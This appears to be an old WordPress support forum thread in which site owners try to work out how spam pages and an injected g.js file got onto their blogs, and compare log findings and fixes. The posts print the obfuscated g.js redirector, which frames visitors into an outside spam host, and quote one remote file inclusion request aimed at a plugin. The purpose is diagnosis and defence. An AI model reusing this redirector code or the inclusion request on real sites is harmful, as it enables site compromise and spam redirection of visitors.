WordPress.org

Ready to get started?Download WordPress

Forums

My site was ambushed...need help figuring out how (30 posts)

  1. griffman
    Member
    Posted 6 years ago #

    [Note: I edited this post to contain the full .js file]

    Tonight, while checking my site backup's sync log, I noticed a folder named "1" in the output, residing at the top level of the wp-content folder. Within the "1" folder, there are 71 separate files -- 70 poker-site-spammy HTML pages, each in Italian, and one g.js file. There was also a folder named backup-6bb0d, which contained a zero-byte index.php, at the top level of the wp-content folder. The wp-content's index.php file (which just says 'silence is golden') had also been edited or replaced -- but the only change is a blank line on row one. My site itself wasn't hacked -- all files and folders are just fine. No new stories or comments or users were created, etc. It seems the extent of the hack was creating the "1" folder.

    I checked my sftp, ftp, and access logs, and there's nothing suspicious there at all -- which makes me suspect this is some sort of injection attack. I searched the logs around the time the files were created, but with my limited technical skills, noting seemed out of whack (there are no references to "poker.html" in any of the log files, for instance). The g.js file contains one "var str" definition that's ASCII encoded; I decoded it and got this output (line breaks added for readability):

    var referer = escape(document.referrer);"
    "var fromd    = escape(document.location);"
    "document.write("<fram"+"eset frame"+"border=0
    frames"+"pacing=0 border=0 rows=\"1"+"00%, *
    \"noresize><fr"+"ame name=\"online\" src=\""+
    fid+"&q="+q1+"&referer="+referer+"&l="+lang+"
    &c="+subacc+"&from="+fromd+"\" noresize></fra"+"meset>");

    That means nothing at all to me. Here's the full .js file, with the "var str" bit removed, given it's shown above:

    function Decode()
    {
    var temp="",i,c=0,out="";
    var str="118#97#114#32#etc as decoded above...;
    l=str.length;
    while(c<=str.length-1)
      {
      while(str.charAt(c)!='#')
      temp=temp+str.charAt(c++);
      c++;
      out=out+String.fromCharCode(temp);
      temp="";
      }
    document.write(out);
    }
    
    function r(keyw, cat, lang)
    {
    document.write("<script language='javascript'>");
    document.write("var fid='http://www.preserve"+"sight"+"colorado.org/feb.php?2'; var q1='"+keyw+"'; var lang='"+lang+"'; var subacc='"+cat+"';");
    Decode();
    document.write("<\/script>");
    }

    In the HTML files themselves, there are only four links. The first three are external links, but they simply go to the Italian versions of Google, MSN, and Yahoo (nothing passed with the URLs at all, just the root). The fourth is an href link back to the document itself, like this:

    <a href="giochi-poker-gratis-da-scaricare.html">giochi poker gratis da scaricare</a>

    I'm not sure if the Javascript works (somehow?) with that last URL, but that's all that's in each file (I'll gladly send anyone the folder if you want to take a look at the whole thing). I also Googled on one of the less-commonly-named files, and found that my site is not alone. As you can see there, a number of WordPress sites contain the "1" folder and associated HTML files.

    My site runs WordPress 2.3.3, but I do use a number of third-party plug-ins -- and that's where my suspicions lie for the most likely culprit. However, I don't have any idea how to go about figuring out how someone got in ... nor if there are better places than this to report an apparent security issue. So if anyone can offer any advice, I'd welcome it!

    thanks;
    -rob.

  2. Joni
    Member
    Posted 6 years ago #

    Yep, someone here on the WP forums warned about it on March 13 and posted this link: (I cannot find the original WP post right now, but I did bookmark the link.)

    http://seo.mhvt.net/blog/?p=268

  3. whooami
    Member
    Posted 6 years ago #

    it would be useful to know what plugins you have on that site.

    let me guess -- you are using either wp-cache, or wp-db-backup? Or both?

  4. macsoft3
    Member
    Posted 6 years ago #

    Someone here on the WP forums warned about it on March 13...

    That was our story. The article is shown at p=268. So you've got the right link. So far, at least 62 or 63 WordPress blog websites are known to have been exploited in this manner. robservatory.com is not in the list.

    griffman, I wonder if you could send those 71 files in zip to junk912@gmail.com? We love junks files and junk mail. Again, we do analyze security issues. Thanks.

  5. griffman
    Member
    Posted 6 years ago #

    Plug-ins. I have a larger number installed, but only these are active (are non-active plug-ins exploitable??):

    Active Discussions 1.1
    Addicted To Live Search 1.02
    AJAX Comment Preview 1.2.1
    Ajaxified Expand NOW 0.8 beta 2
    Category Replacement Widget 0.5
    Dashboard Options 1.4.1
    Drop-down Archive Widget 0.2
    Get Recent Comments 2.0.2
    GetWeather 1.2.1
    Get Weather Widget 0.2
    http:BL WordPress Plugin 1.4
    Linkblock widget 1.1rc0
    Spam Karma 2 2.3 rc4

    I have wp-db-backup installed, but non-active. I do not have wp-cache installed. I have one additional personal plug-in (custom registration screen) I wrote installed, but given other sites have been hit with the same thing, I doubt it's the problem.

    macsoft3: files sent.

    Thanks all for the answers -- I searched here, but didn't find the March 13th post...not sure what happens from here out (should I report this somehow to the WP developers?), but I'm certainly going to keep an eye on my wp-content folder!

    -rob.

  6. whooami
    Member
    Posted 6 years ago #

    If your wp-content directory is still writable, fix that.

    chmod 755.

    That's one of the first things I would be doing. Ive argued against plugins and settings that require that for three years.

    As to whether or not non activated plugins are potentially exploitable -- yes, they are -- when it comes to any kind of Remote File Inclusion attacks. If I can call a file, I can use it. Whether or not a plugin is activated makes no difference.

    I would be interested in seeing your Apache log files, if you have them available.

    I am not in China, or some other Southeast Asian country (thats notorious for what else, but spam), and I dont pretend to be some "spam terrorist" warrior. I also dont use this forum as an advertising agency for my own blog. Furthermore, terrorist, as macsoft has used it, is grossly incorrect. But thats another story all together.

    Anyway, if you feel like having another set of eyes look over them, I would love to see your Apache access logs for the this month. And your error logs, if you have them being generated separately. I dont need to see the content of the added files, they're useless.

    My email addy is whoo --AT-- whoo.org

  7. macsoft3
    Member
    Posted 6 years ago #

    Thanks, griffman. I got it. jonimueller refers March 13 report to the one at seo.mhvt.net. If you can answer, what is the date stamp on those files in folder 1? Is it March 12 or 13? Or around 02:58 AM on the 15th? I'm just curious. Again, thanks. They started hacking WP websites at least before 11th.

  8. griffman
    Member
    Posted 6 years ago #

    My wp-content directory is *not* generally writable, nor has it ever been generally writable. Here's what it's set up as:

    drwxr-xr-x Mar 16 08:42 wp-content

    I have removed the inactive plug-ins, and also killed the xmlrpc.php file, as I don't use its features. I will send you the March-ish access logs, but I don't have error logs (my host does not provide them, sadly).

    -rob.

  9. griffman
    Member
    Posted 6 years ago #

    macsoft: The files were all timestamped 2:58am on the 15th.

    -rob.

  10. macsoft3
    Member
    Posted 6 years ago #

    Thanks, griffman. That means they are constantly hacking WP blogs.

    There's an interesting code embedded in g.js. It's "118#97#114#32#114#101#102#101#114#101#114#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#114#101#102#101#114#114#101#114#41#59#10#118#97#114#32#102#114#111#109#100#32#32#32#32#61#32#101#115#99#97#112#101#40#100#111#99#117#109#101#110#116#46#108#111#99#97#116#105#111#110#41#59#10#100#111#99#117#109#101#110#116#46#119#114#105#116#101#40#34#60#102#114#97#109#34#43#34#101#115#101#116#32#102#114#97#109#101#34#43#34#98#111#114#100#101#114#61#48#32#102#114#97#109#101#115#34#43#34#112#97#99#105#110#103#61#48#32#98#111#114#100#101#114#61#48#32#114#111#119#115#61#92#34#49#34#43#34#48#48#37#44#32#42#32#92#34#110#111#114#101#115#105#122#101#62#60#102#114#34#43#34#97#109#101#32#110#97#109#101#61#92#34#111#110#108#105#110#101#92#34#32#115#114#99#61#92#34#34#43#102#105#100#43#34#38#113#61#34#43#113#49#43#34#38#114#101#102#101#114#101#114#61#34#43#114#101#102#101#114#101#114#43#34#38#108#61#34#43#108#97#110#103#43#34#38#99#61#34#43#115#117#98#97#99#99#43#34# 38#102#114#111#109#61#34#43#102#114#111#109#100#43#34#92#34#32#110#111#114#101#115#105#122#101#62#60#47#102#114#97#34#43#34#109#101#115#101#116#62#34#41#59#"

    I thought I could decode it, but no vail so far.

    Ahh, sorry. griffman already decoded it.

  11. whooami
    Member
    Posted 6 years ago #

    great Rob .. Im looking forward to looking at them.

    If you like, I can provide a way for you do some more intense logging, and I HIGHLY recommend finding out if your host has mod_security compiled into Apache. If they do, use it.

  12. whooami
    Member
    Posted 6 years ago #

    I found the exploit in your logs. Check your email in a few minutes.

    I will be emailing security@wordpress.org

  13. whooami
    Member
    Posted 6 years ago #

    There were http_posts sent to certain files (that I pointed out in my emails). The data sent in the posts isnt going to be seen in your logs, unfortunately. The filename, however, is clear as day.

    You can log ALL http_posts. Ive emailed you a few times, so I'll wait to hear back from you and then if you are willing you can be a honeypot :)

    I'll also take this opportunity to reiterate that I would not share this info with anyone else. Its NOT going on MY blog, and anything we talk about in emails is between you, me, and whoever answers email at security@

  14. whooami
    Member
    Posted 6 years ago #

    Without divulging the file name, I should say, that I just looked through my own mod_security logs, and see a different attempt at an RFI attack, pointed at a core file that lives inside wp-includes/

    Interesting. Time to go test that.

  15. thesu
    Member
    Posted 6 years ago #

    This happened to me, too! The file was timestamped 3/18. My wp-content folder was already set at permission 755, so I don't know how the hacker got in there. I was running wp-cache and deactivated it. I also deleted the "1" folder, but I wonder if the hacker will come back?

  16. whooami
    Member
    Posted 6 years ago #

    this thread was resolved, thesu. I assure you that if your site was compromised at some point, they will come back.

    You might not see em, but they will come back. Keep in mind, that coming back doesnt mean they are successful -

    There were several key things left out of your post though:

    1. what version of WP were you running at the time you discovered the hack? Youre running 2.3.3 now..

    2. What have you done to secure your site since seeing this? You mention nothing.

    Deleting the files.. is like putting a bandaid on a severed artery. You just bleed to death slower.

  17. TheTim
    Member
    Posted 6 years ago #

    I just discovered the same issue on my site, which is running WordPress 2.3.3. Whooami, you say that this was resolved, but I don't see any explanations of what can be done to prevent it from happening again? The permissions on my wp-content folder are already set to 755.

    So what's the solution to this?

  18. whooami
    Member
    Posted 6 years ago #

    I have blogged about what I have done in repairing previously hacked sites on my own blog. This isnt a directory permission issue, it never has been one. People that suggest otherwise, arent aware of how the exploits are being used.

    This thread was resolved because the OP contacted me privately. The underlying issue is hardly resolved because WP users with compromised sites arent taking the necessary steps to insure their sites are made secure.

    1> http://www.village-idiot.org/archives/2008/03/18/wordpress-spam-inject-honeypot/

    2 > http://www.village-idiot.org/archives/2008/03/19/wordpress-spam-inject-honeypot-2/

  19. mvandemar
    Member
    Posted 6 years ago #

    "This thread was resolved because..."

    This thread is not actually resolved, since a clean install of 2.3.3 has this vulnerability as well. While changing the cookie names may indeed thwart whatever bot it is that is currently pushing out this exploit, I can promise you that it is a stopgap at best.

  20. raygene
    Member
    Posted 6 years ago #

    If your wp-content directory is still writable, fix that.

    chmod 755.

    That's one of the first things I would be doing. Ive argued against plugins and settings that require that for three years.

    OK, just did that, thanks.

    Will the 755 permissions interfere with the plugins?

    Gene

  21. whooami
    Member
    Posted 6 years ago #

    Ive offered to help set up $_POST logging for anyone that is interested in coming to more definitive conclusions regarding any of the hacked sites and their causes. For ppl that are so terribly concerned, Ive gotten few replies.

    Ive contacted 10 or so admins privately about their hacked installs -- no replies, the blogs remain exploited, and not surprisingly, the admins keep posting. In other words, they seemingly dont care.

    The OP in this thread was contacted by a developer as well as getting help from me, and since its his thread, and his problem was solved, the thread is resolved. The rest of you are "hangers on" which aren't adding anything meaningful to the fray, in my opinion.

    Here is the offer again, if you think fresh installs of 2.3.3 are vulnerable, then set up $_POST logging and see what happens. If you need to know how to do that, contact me off list.

    Secondly, Apache logs all $_GET requests, which would clearly show RFI attacks that are called like so:

    archives/2006/06/29/wp-chunk//wp-content/plugins/sniplets/modules/syntax_highlight.php?variable_removed=http://americanpsycho.net/new/id.txt?

    Instead of standing by and waiting for someone else to take some initiative, start looking at things, and start being proactive instead of reactive.

  22. whooami
    Member
    Posted 6 years ago #

    I will share some info on the wp-content/1 thing in an attempt to get some synapses firing.

    The OP provided myself and a developer his Apache logs.

    Looking inside his logs, it was clear where and when the actual actual upload of the files took place. It was also clear what file was file being used to accomplish the upload.

    There were a couple things that stood out to me though.

    First, there were hits to wp-login.php immediately prior to the upload. Were they successful logins from a subscriber? (the OP has only one administrator account) From a forged cookie? I don't know, since we dont see $_POST variables in Apache logs.

    Secondly, they wrote content to wp-content/index.php, and in turn that content precipitated a call to another file, which was responsible for grabbing all the uploaded content and unpacking it.

    I can tell you that the calls to the WordPress file in question result in you being immediately redirected to wp-login.php

  23. whooami
    Member
    Posted 6 years ago #

    actually, after taking another look at the OP's logs -- its clear that the login was successful. There are 11 log entries, spanning three minutes, they start with a login, and end with a call to a core WP file that cannot be called unless you are logged in. In between, there are calls to the same core WP file, and one file that is created that appears responsible for the uploaded content.

  24. zdes
    Member
    Posted 6 years ago #

    One of my clients just pointed out the same problem after some investigation I found something that peeked my curiosity...

    at the root of /wp-content/ was a folder named "advanced-cache.php" any attempt to open it or change the permissions would result in an FTP error. Renaming it was allowed though, but would not let me download the it. Finally after trying this and that I was able to open it using the ftp browser built into Firefox... I was able to delete this file by creating a new directory moving it there and deleting the new directory.

    here are the contents:
    ----- BEGIN

    time() ) { $meta = new CacheMeta; if (! ($meta = unserialize(@file_get_contents($meta_pathname))) ) return; foreach ($meta->headers as $header) { header($header); } $log = "\n"; if ( !($content_size = @filesize($cache_file)) > 0 || $mtime < @filemtime($cache_file)) return; if ($meta->dynamic) { include($cache_file); } else { /* No used to avoid problems with some PHP installations $content_size += strlen($log); header("Content-Length: $content_size"); */ if(!@readfile ($cache_file)) return; } echo $log; die; } $file_expired = true; // To signal this file was expired } function wp_cache_postload() { global $cache_enabled; if (!$cache_enabled) return; require(ABSPATH . 'wp-content/plugins/wp-cache/wp-cache-phase2.php'); wp_cache_phase2(); } function wp_cache_get_cookies_values() { $string = ''; while ($key = key($_COOKIE)) { if (preg_match("/^wordpress|^comment_author_email_/", $key)) { $string .= $_COOKIE[$key] . ","; } next($_COOKIE); } reset($_COOKIE); return $string; } ?>

    -----

    We are on WP 2.1.3 - with whole lot of plugins,
    wp-content CHMODed to 755

  25. zdes
    Member
    Posted 6 years ago #

    Oops advanced-cache.php is a symlink for wp-cache, DO NOT Delete it! It will break WP.

  26. burchwords
    Member
    Posted 6 years ago #

    this happened to me too, is there anyway to tell what caused it?

  27. bigbluemachine
    Member
    Posted 6 years ago #

    I believe my WP site is included in these numbers = ( of sites attacked.
    I discovered the problem early yesterday morning by happenstance as I don't go merrily tromping through my source code too often (not being a "tech guy" with the full on "tech guy know how" to fall back on I never thought it a safe thing to fool around in.)

    As it stands the normal guy I ask when something tech comes up is stumped and possibly because his own WP sites aren't effected hasn't really looked into it as far as I am trying. So I've been pretty stressed out about this.

    I deleted from the 2 sections in the presentation edit area I found the attack in ( header and footer php respectively) and other than furiously searching for any signs on the internet that would point to "I've done enough and the problem is fixed" or " I deleted just the visible part of the problem and future danger from this cyber rape (sorry, its how I feel about it = /) is on the horizon.

    Any help, info, or anything really ( even some cyber condolences lol) would be most helpful.
    I'm still looking out there and I still have a few links yet to check out so wish me luck and I hope all of you affected as well have managed or are managing to contain the damage.
    Thanks in advance.

  28. sonnata
    Member
    Posted 5 years ago #

    I just wanted to thank whooami for helping us to sort out the same issue with our site. I probably made the problem worse by trying to fix it myself.

    I'm really clueless when it comes to blogs. Whooami did a great job figuring out the problem, rapidly fixing it & suggesting ways to keep it from happening again.

    Thanks Whooami!

  29. whooami
    Member
    Posted 5 years ago #

    youre welcome :)

  30. sonnata
    Member
    Posted 5 years ago #

    now, that's what I call fast!

Topic Closed

This topic has been closed to new replies.

About this Topic